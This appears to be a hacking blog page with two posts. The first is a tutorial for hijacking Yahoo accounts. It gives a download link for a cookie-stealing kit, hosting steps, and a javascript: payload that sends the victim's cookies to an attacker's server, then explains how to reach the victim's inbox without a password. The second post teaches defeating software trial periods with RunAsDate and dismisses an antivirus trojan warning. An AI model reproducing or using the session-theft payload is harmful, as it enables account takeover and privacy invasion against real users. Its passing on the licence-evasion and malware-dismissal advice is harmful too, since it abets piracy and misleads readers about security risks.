Hack Yahoo accounts with Session IDs or session cookies

Hack Yahoo accounts with Session IDs or session cookies 

What are session IDs or session cookies ?
Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to yahoo.com. Type in browser javascript:alert(document.cookie);
You would get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .

Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies.

 An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out. 

But in case of yahoo, its not the same.The attacker doesnt get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs  by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the  yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar

Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com. you can choose 000webhost.com also
2.  Login to your account and go to file manager. Upload the four files that you have just downloaded.
    Make a new directory 'cookies' here.

3. Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 
He would again redirected to his yahoo account.

4. Open the hacked.php . The password is 'explore'.

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.
 This article is only for educational purposes only,i'm not be Responsible for any wrong use of this Article..

Read more »

Hack Softwares to use them Forever without Expiration

Hack Trial Version Softwares to use them Forever 

 

Hi, I am back today with a most usefull article..Hope all of you will Like It ! Here i will show you that "How to Hack Softwares to use them Forever ?" . That really a useful article,because in our daily life we need thousand of softwares today,which of most are highly paid..So how to use them Freely for whole Like ??

Most of us are familiar with many softwares that run only for a specified period of time in the trial mode.Once the trial period is expired these softwares stop functioning and demand for a purchase.But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?

Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares.I’ll try to explain this in brief.Because Purpose if ICA is 1st to clear your basics.So,When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc.After installation every time you run the software, it compares the current system date and time with the installed date and time.So, with this it can make out whether the trial period is expired or not.

So with this being the case, just manually changing the system date to an earlier date will not solve the problem.For this purpose there is a small Tool known as RunAsDate.

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.

Download RunAsDate v1.10

Intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.It works with Windows 2000, XP, 2003 and Vista.

NOTE: FOLLOW THESE TIPS CAREFULLY
You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.
1. Note down the date and time, when you install the software for the first time.
2. Once the trial period expires, you must always run the software using RunAsDate .
3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.
4. It is better and safe to inject the date of the last day in the trial period.

For example, if the trial period expires on Jan 1 2014, always inject the date as Dec 30 2013 in the RunAsDate.

Warning : AVG Antivirus reports that RunAsDate is infected with "Trojan horse Generic 10.Thk". This will not harm ur pc,warning is just because this is a windows registry hack tool !
This article is only for educational purposes only,i'm not be Responsible for any wrong use of this Article..  

Read more »